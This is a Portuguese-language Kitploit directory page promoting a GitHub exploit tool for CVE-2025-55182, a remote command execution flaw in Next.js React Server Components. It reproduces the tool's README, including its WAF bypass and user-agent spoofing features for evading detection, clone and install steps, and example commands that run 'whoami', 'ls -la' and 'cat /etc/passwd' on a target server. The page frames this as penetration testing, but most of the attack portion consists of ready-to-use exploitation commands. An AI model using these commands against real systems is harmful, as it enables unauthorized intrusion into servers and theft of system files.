Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-poc-tool — Ferramenta automatizada de exploração para CVE-2025-55182 no Next.js React Server Components. Permite execução remota de comandos com bypass de WAF integrado, cabeçalhos personalizados e varredura em lote para teste de penetração. | Kitploit
Ferramentas/GitHubGitHub/dh4v4l8/cve-2025-55182-poc-tool
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubdh4v4l8/cve-2025-55182-poc-tool

CVE-2025-55182-poc-tool

Ferramenta automatizada de exploração para CVE-2025-55182 no Next.js React Server Components. Permite execução remota de comandos com bypass de WAF integrado, cabeçalhos personalizados e varredura em lote para teste de penetração.

Ver Repositório
314há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-poc-tool

Uma ferramenta de exploração poderosa para detetar e explorar a vulnerabilidade CVE-2025-55182 nos React Server Components do Next.js. Esta ferramenta permite a execução remota de comandos (RCE) em aplicações Next.js vulneráveis, com capacidades integradas de bypass de WAF.

logo

Visão Geral

CVE-2025-55182 é uma vulnerabilidade crítica nos React Server Components do Next.js que permite a atacantes remotos executar comandos arbitrários em servidores vulneráveis. Esta ferramenta fornece uma forma automatizada de detetar e explorar esta vulnerabilidade.

Funcionalidades

  • Execução Remota de Comandos: Execute comandos arbitrários em servidores Next.js vulneráveis

  • Bypass de WAF: Bypass integrado de Firewall de Aplicação Web com dados de lixo configuráveis

  • Suporte a Headers Personalizados: Adicione cabeçalhos HTTP personalizados para autenticação ou outros fins

  • Segmentação Flexível: Suporte para alvos únicos e análise em lote

  • Suporte a Múltiplos Protocolos: Deteção e tratamento automáticos de HTTPS/HTTP

  • Timeouts Personalizáveis: Timeouts de pedido configuráveis para diferentes condições de rede

  • Controlo de Verificação SSL: Opção para desativar a verificação de certificados SSL

  • User-Agents Personalizados: Falsifique user agents para evitar deteção

Instalação Rápida

root@kitploit:~
# Clone o repositório
git clone https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool

# Torne o script executável
chmod +x exploit.sh

# Teste a instalação
./exploit.sh -h

Uso

A ferramenta expõe várias opções de linha de comando que permitem aos investigadores personalizar pedidos, simular tráfego ou testar camadas de filtragem.

root@kitploit:~
Uso: ./exploit.sh [OPÇÕES]

Opções:
  -d, --domain          Domínio/URL alvo (padrão: http://localhost:3000)
                        Se nenhum protocolo for especificado, assume https://
  -c, --command         Comando a executar (padrão: id)
  -w, --waf-bypass      Ativar bypass de WAF com dados de lixo (padrão: 128KB)
  --waf-size SIZE       Tamanho dos dados de bypass de WAF em KB (padrão: 128)
  --timeout SECONDS     Timeout do pedido em segundos (padrão: 15)
  -k, --insecure        Desativar verificação de certificado SSL
  --user-agent AGENT    String de User-Agent personalizada
  -h, --help            Mostrar esta mensagem de ajuda

Uso Básico

root@kitploit:~
# Verificar se o alvo é vulnerável com o comando padrão
./exploit.sh -d https://target.com

# Executar comando personalizado
./exploit.sh -d https://target.com -c "whoami"

# Ler ficheiros do sistema
./exploit.sh -d https://target.com -c "cat /etc/passwd"

Uso Avançado

root@kitploit:~
# Ativar bypass de WAF
./exploit.sh -d https://target.com -c "ls -la" -w

# Tamanho personalizado de bypass de WAF (256KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

# Desativar verificação SSL
./exploit.sh -d https://target.com -c "id" -k

# Timeout personalizado
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30

# User-Agent personalizado
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"

Créditos

  • Esta ferramenta é baseada em pesquisa da comunidade de segurança. Agradecimentos especiais a:

infosec_au

zack0x01

Baixar ferramenta